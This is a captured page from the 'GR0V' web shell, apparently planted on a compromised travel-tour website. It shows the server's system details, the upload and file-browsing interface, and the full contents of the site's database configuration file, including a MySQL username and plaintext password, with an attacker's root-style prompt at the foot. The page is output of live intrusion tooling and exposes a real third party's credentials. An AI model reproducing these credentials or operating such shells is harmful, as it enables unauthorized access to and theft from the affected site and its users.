? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/public_html/old/happyezystyle/include/
File Upload :
Current File : /home/admin/public_html/old/happyezystyle/include/connectdb.php

<?
// ???????????????????
$host="localhost";
$username = "admin_happyko";
$password = "admin*tour2015";
$db="admin_happyko";
$connection=mysqli_connect($host,$username,$password,$db);
if (mysqli_connect_errno()) {
    echo "Error: Unable to connect to MySQL." . mysqli_connect_error();
    exit;
}
mysqli_query($connection,"set NAMES utf8");

// ?????????? Head Title ??? Buttion Text ????????
$headtxt_web = "";
$buttomtxt_web = "Copyrights (c) 2012. Webdesign-d.com. All rights reserved. <br>Email : <a href=mailto:admin@webdesign-d.com>admin@webdesign-d.com</a>";

// ?????????? Head Title ??? Buttion Text ???? Admin
$headtxt = "ThrBridges Magazine Thai&Korea Culture Magazine Online";
$buttomtxt = "Copyrights (c) 2012.  . All rights reserved. <br>Email : <a href=mailto:admin@webdesign-d.com>admin@webdesign-d.com</a>";

?>

T1KUS90T
  root-grov@210.1.60.28:~$